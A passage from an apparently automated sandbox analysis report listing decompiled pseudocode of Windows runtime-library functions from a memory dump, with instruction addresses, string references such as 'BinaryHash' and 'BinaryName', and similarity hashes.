												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01A67016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E01A7FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1ad5350;
							if(_t109 != 0x1ad5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E01A7FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01A75720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x019e2d8a
0x019e2d8a
0x019e2d92
0x019e2d96
0x019e2d9e
0x019e2da0
0x019e2da3
0x019e2da5
0x019e2da8
0x019e2dab
0x019e2db2
0x01a3f9aa
0x01a3f9ab
0x01a3f9ae
0x01a3f9ae
0x019e2db8
0x019e2dc2
0x01a3f9b9
0x01a3f9be
0x01a3f9bf
0x01a3f9bf
0x019e2dcf
0x01a3f9c9
0x019e2dd5
0x019e2dd5
0x019e2dd5
0x019e2dde
0x019e2de1
0x019e2e70
0x019e2e72
0x019e2e72
0x019e2de7
0x019e2deb
0x019e2e7c
0x019e2e83
0x019e2e85
0x019e2e8b
0x019e2e8d
0x019e2e92
0x019e2e92
0x019e2e85
0x019e2df1
0x019e2df7
0x019e2df9
0x019e2df9
0x019e2dfc
0x019e2dff
0x019e2e02
0x00000000
0x019e2e05
0x019e2e0c
0x01a3f9d9
0x019e2e12
0x019e2e12
0x019e2e12
0x019e2e1a
0x01a3f9e3
0x01a3f9e9
0x01a3f9f0
0x01a3f9f6
0x01a3f9f8
0x01a3f9f8
0x01a3f9f0
0x019e2e23
0x01a3fa02
0x01a3fa03
0x01a3fa05
0x01a3fa06
0x00000000
0x019e2e29
0x019e2e29
0x019e2e2e
0x019e2e34
0x019e2e3e
0x00000000
0x00000000
0x019e2e44
0x019e2e47
0x019e2e4d
0x00000000
0x00000000
0x019e2e4f
0x019e2e54
0x00000000
0x00000000
0x019e2e5a
0x019e2e5f
0x019e2e9a
0x019e2ea4
0x019e2ea5
0x019e2ea8
0x019e2eaf
0x019e2eb2
0x019e2eb5
0x01a3fae9
0x01a3faeb
0x01a3faed
0x01a3faef
0x01a3faf7
0x01a3faf8
0x01a3fafd
0x01a3faff
0x01a3fb04
0x01a3fb04
0x01a3faff
0x019e2ec0
0x019e2ec4
0x019e2ec6
0x019e2ec8
0x01a3fb14
0x01a3fb18
0x01a3fb1e
0x01a3fb21
0x01a3fb21
0x019e2ece
0x019e2ece
0x019e2ece
0x019e2ed7
0x019e2e61
0x019e2e63
0x01a3fa6b
0x01a3fa71
0x01a3fa76
0x01a3fa78
0x01a3fa8a
0x01a3fa7a
0x01a3fa83
0x01a3fa83
0x01a3fa8f
0x01a3fa91
0x01a3fa97
0x01a3fa9d
0x01a3faa4
0x01a3faaa
0x01a3faaf
0x01a3fab1
0x01a3fac3
0x01a3fab3
0x01a3fabc
0x01a3fabc
0x01a3fac8
0x01a3facb
0x01a3fadf
0x01a3fadf
0x01a3facb
0x01a3faa4
0x01a3fa91
0x019e2e6f
0x019e2e6f
0x019e2e5f
0x01a3fa13
0x01a3fa15
0x01a3fa17
0x01a3fa1f
0x01a3fa21
0x01a3fa22
0x01a3fa25
0x01a3fa28
0x01a3fa2f
0x01a3fa2f
0x01a3fa2a
0x01a3fa2a
0x01a3fa2a
0x01a3fa31
0x01a3fa34
0x01a3fa36
0x01a3fa3c
0x01a3fa3e
0x01a3fa41
0x01a3fa43
0x01a3fa45
0x01a3fa45
0x01a3fa41
0x01a3fa3c
0x01a3fa4a
0x01a3fa4f
0x01a3fa51
0x01a3fa53
0x01a3fa56
0x01a3fa5b
0x01a3fa5e
0x00000000
0x01a3fa5e
0x019e2e23

Strings

RTL: Re-Waiting, xrefs: 01A3FA4A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 2b3800236f23fdd913de582c8cab24c89b9c8761a8be2eb97152710a51e6bb33
Instruction ID: a961b4fc813a4de3d666cab154a12600377dda57e3fc8fd2e6334b41e37bf087
Opcode Fuzzy Hash: 2b3800236f23fdd913de582c8cab24c89b9c8761a8be2eb97152710a51e6bb33
Instruction Fuzzy Hash: B3613631E006159FEB33DF6CC948B7EBBF8EB84714F140669E955972C1C734A9418792

Uniqueness

Uniqueness Score: -1.00%

Function 01AB0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01AB0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E01AAFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01AB1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01A29730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E01AAA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E01AAA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1ad8b04 >> 0x14) + (_v44 -  *0x1ad8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01A07D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E01AA138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01A07D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E01A9FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1ad8724 & 0x00000008) != 0) {
						E01AA52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E01AB15B5(0x1ad8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01ab0eb7
0x01ab0eb9
0x01ab0ec0
0x01ab0ec2
0x01ab0ecd
0x01ab105b
0x01ab105b
0x01ab1061
0x01ab1066
0x01ab1066
0x01ab106b
0x01ab1073
0x01ab1073
0x01ab0ed3
0x01ab0ed6
0x01ab0edc
0x01ab0ee0
0x01ab0ee7
0x01ab0ef0
0x01ab0ef5
0x01ab0efa
0x01ab0efc
0x01ab0efd
0x01ab0f03
0x01ab0f04
0x01ab0f06
0x01ab0f07
0x01ab0f09
0x01ab0f0e
0x01ab0f14
0x01ab0f23
0x01ab0f2d
0x01ab0f34
0x01ab0f34
0x01ab0f14
0x01ab0f52
0x00000000
0x00000000
0x01ab0f58
0x01ab0f73
0x01ab0f74
0x01ab0f79
0x01ab0f7d
0x01ab0f80
0x01ab0f86
0x01ab0fab
0x01ab0fb5
0x01ab0fc6
0x01ab0fd1
0x01ab0fe3
0x01ab0fd3
0x01ab0fdc
0x01ab0fdc
0x01ab0feb
0x01ab1009
0x01ab1009
0x01ab1015
0x01ab1027
0x01ab1017
0x01ab1020
0x01ab1020
0x01ab102f
0x01ab103c
0x01ab103c
0x01ab1048
0x01ab1050
0x01ab1050
0x01ab1055
0x00000000
0x01ab1055
0x01ab0f88
0x01ab0f9e
0x01ab0fa2
0x01ab0fa9
0x00000000
0x00000000
0x00000000
0x01ab0fa9
0x00000000

Strings

`, xrefs: 01AB0F16

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 63bf086020d8782240de4efd82db9496cb6e8c4fb0e3f1fb26350868499625bf
Instruction ID: 8ad2b9ee120186cae58fefb00cf83dbcefa05e399fb01ce77d4d58305cb89934
Opcode Fuzzy Hash: 63bf086020d8782240de4efd82db9496cb6e8c4fb0e3f1fb26350868499625bf
Instruction Fuzzy Hash: 7B519D713043829FD325DF28D9D4B5BBBE9EB84714F04092CF68697292D774E805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01A1F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01A1F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01A04120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01A29830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01A29990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E01A295D0();
							goto L11;
						} else {
							_t109 = L01A04620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E01A2F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E01A295D0();
										L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x01a1f0d3
0x01a1f0d9
0x01a1f0e0
0x01a1f0e7
0x01a1f0f2
0x01a1f0f4
0x01a1f0f8
0x01a1f100
0x01a1f108
0x01a1f10d
0x01a1f115
0x01a1f116
0x01a1f11f
0x01a1f123
0x01a1f124
0x01a1f12c
0x01a1f130
0x01a1f134
0x01a1f13d
0x01a1f144
0x01a1f14b
0x01a1f152
0x01a5bab0
0x01a5bab0
0x01a1f158
0x01a1f158
0x01a1f15a
0x01a1f160
0x01a1f165
0x01a1f166
0x01a1f16f
0x01a1f173
0x01a5baa7
0x01a5baa7
0x01a5baab
0x00000000
0x01a1f179
0x01a1f18d
0x01a1f191
0x01a5baa2
0x00000000
0x01a1f197
0x01a1f19b
0x01a1f1a2
0x01a1f1a9
0x01a1f1af
0x01a1f1b2
0x01a1f1b6
0x01a1f1b9
0x01a1f1c4
0x01a1f1d8
0x01a1f1df
0x01a1f1e3
0x01a1f1eb
0x01a1f1ee
0x01a1f1f4
0x01a1f20f
0x01a5bab7
0x01a5babb
0x01a5bacc
0x01a5bad1
0x01a1f215
0x01a1f218
0x01a1f226
0x01a1f22b
0x00000000
0x01a1f22b
0x01a1f1f6
0x01a1f1f6
0x01a1f1f9
0x01a1f1fb
0x01a1f1fb
0x01a1f1f4
0x01a1f191
0x01a1f173
0x01a1f152
0x01a1f203

Strings

@, xrefs: 01A1F124

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 2251a91d4470fa8f6efe60d87b598ea6402b6152d403585461f3ccd16fbcb4cc
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 665190716047119FC321DF69C940A6BBBF9FF48B10F00892DFAA597690E7B4E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01A63540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01A63540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x1add360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01A20BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01A63706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E01A2FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01A63540;
						E01A2FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E01A3DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01A70C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E01A297C0();
					}
					return E01A2B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01A63971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01A63884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E01A2FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01A29650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01A63787(_a4,  &_v352, _t80);
						}
					}
					L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E01A295D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01a63552
0x01a6355a
0x01a6355d
0x01a63566
0x01a63567
0x01a6357e
0x01a6358f
0x01a635a1
0x01a635a5
0x01a6366b
0x01a6366b
0x01a6366d
0x01a63672
0x01a63679
0x01a63685
0x01a6368d
0x01a6369d
0x01a636a7
0x01a636b8
0x01a636c6
0x01a636c7
0x01a636dc
0x01a636e1
0x01a636e7
0x01a636e9
0x01a636e9
0x01a63703
0x01a63703
0x01a635b5
0x01a635c0
0x01a635c4
0x00000000
0x00000000
0x01a635ca
0x01a635d7
0x01a635e2
0x01a635e6
0x01a635e8
0x01a635f5
0x01a635fa
0x01a63603
0x01a63604
0x01a63609
0x01a6360a
0x01a63612
0x01a63613
0x01a6361e
0x01a63622
0x01a63628
0x01a6362f
0x01a6362f
0x01a63636
0x01a63638
0x01a6363b
0x01a63642
0x01a63642
0x01a63636
0x01a63657
0x01a63657
0x01a6365c
0x01a63662
0x01a63669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 01A6358F

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 2025e8eb889b99e47a884d99deee3d4e60441393cf41f8df98b60d90dbdf0424
Instruction ID: 300b6bfebb7a2076dac55efebfaecf2d34412bbbaa8a8fafcb2c261f9a2dd088
Opcode Fuzzy Hash: 2025e8eb889b99e47a884d99deee3d4e60441393cf41f8df98b60d90dbdf0424
Instruction Fuzzy Hash: 7C4151B2D0052DABDF21DA54CD80FEEB77CAF54714F0045A5EA0DAB240DB309E898FA4

Uniqueness

Uniqueness Score: -1.00%

Function 01A63884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01A63884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01A29650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01A04620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01A29650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01a63893
0x01a63896
0x01a63899
0x01a6389f
0x01a638a0
0x01a638a4
0x01a638a9
0x01a638ac
0x01a638ad
0x01a638ae
0x01a638af
0x01a638b1
0x01a638b4
0x01a638bb
0x01a638bc
0x01a638bd
0x01a638c4
0x01a638c8
0x01a638ca
0x01a638ca
0x01a638d5
0x01a6393e
0x01a63940
0x01a63942
0x01a63952
0x01a63954
0x01a63961
0x01a63961
0x01a63967
0x01a6396e
0x01a6396e
0x01a63947
0x01a6394c
0x00000000
0x01a6394c
0x01a638ea
0x01a638ee
0x01a638f8
0x01a638f9
0x01a638ff
0x01a63900
0x01a63902
0x01a63903
0x01a6390b
0x01a6390f
0x01a63950
0x00000000
0x01a63950
0x01a63915
0x01a6391d
0x01a6391d
0x01a63922
0x01a63926
0x00000000
0x01a63928
0x01a6392b
0x01a6392b
0x01a63935
0x01a63937
0x01a63937
0x00000000
0x01a63935
0x01a63926
0x01a638f0
0x00000000

Strings

BinaryName, xrefs: 01A638B4

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 4363552bd96f811a9a87bf861cd6d66e74d170c021568cd59598d9b70fd573d6
Instruction ID: d18f8533a54d470b3ff1451184a9a12cb89ecdc2a683ff76cb208317104f91f2
Opcode Fuzzy Hash: 4363552bd96f811a9a87bf861cd6d66e74d170c021568cd59598d9b70fd573d6
Instruction Fuzzy Hash: 7331D43390151AAFEF16DB59C955E6BBBB8FF50B20F014169EA18A7291D6309E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A1D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E01A1D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1add360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01A04120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E01A2B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E01A298D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E01A295D0();
					L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x01a1d29c
0x01a1d2a6
0x01a1d2b1
0x01a1d2b5
0x01a1d2b6
0x01a1d2bc
0x01a1d2bd
0x01a1d2be
0x01a1d2bf
0x01a1d2c2
0x01a1d2c4
0x01a1d2cc
0x01a1d384
0x01a1d34b
0x01a1d34f
0x01a1d350
0x01a1d351
0x01a1d35c
0x01a1d35c
0x01a1d2d6
0x01a1d2da
0x01a1d2e1
0x01a1d361
0x01a1d369
0x01a1d36d
0x01a1d2e3
0x01a1d2e3
0x01a1d2e3
0x01a1d2e5
0x01a1d2ed
0x01a1d2f5
0x01a1d2fa
0x01a1d302
0x01a1d303
0x01a1d30b
0x01a1d30f
0x01a1d313
0x01a1d318
0x01a1d31c
0x01a1d320
0x01a1d379
0x01a1d37d
0x00000000
0x00000000
0x01a5affe
0x01a5b001
0x01a5b011
0x00000000
0x01a1d322
0x01a1d322
0x01a1d330
0x01a1d337
0x01a1d35d
0x01a1d339
0x01a1d33f
0x01a1d38c
0x01a1d38c
0x01a1d33f
0x01a1d349
0x00000000
0x01a1d349

Strings

@, xrefs: 01A1D303

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a3335da21648c6da4530de2f8c29adb1746117781b159a082eb61f7293c86371
Instruction ID: 1dafeb6aa590a5c8eb7b74fcb0e3eef6b5ec4951ab2e9c5b5810dab8f827629c
Opcode Fuzzy Hash: a3335da21648c6da4530de2f8c29adb1746117781b159a082eb61f7293c86371
Instruction Fuzzy Hash: DA31C0B55083059FC321DF68D9849ABBBF8FB89754F040A2EF99493250E734DD08CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019F1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E019F1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E01A2BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E01A2A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E01A2A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01A04620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x019f1b8f
0x019f1b9a
0x019f1b9c
0x019f1b9e
0x019f1ba3
0x01a47010
0x01a47010
0x00000000
0x019f1ba9
0x019f1ba9
0x019f1bae
0x00000000
0x019f1bc5
0x019f1bca
0x019f1bcf
0x019f1bd0
0x019f1bd1
0x019f1bd2
0x019f1bd6
0x019f1bdc
0x019f1be0
0x01a46ffc
0x01a47000
0x00000000
0x01a47006
0x01a47009
0x01a47009
0x019f1be6
0x019f1bec
0x019f1c0b
0x019f1c0b
0x019f1c0c
0x019f1c11
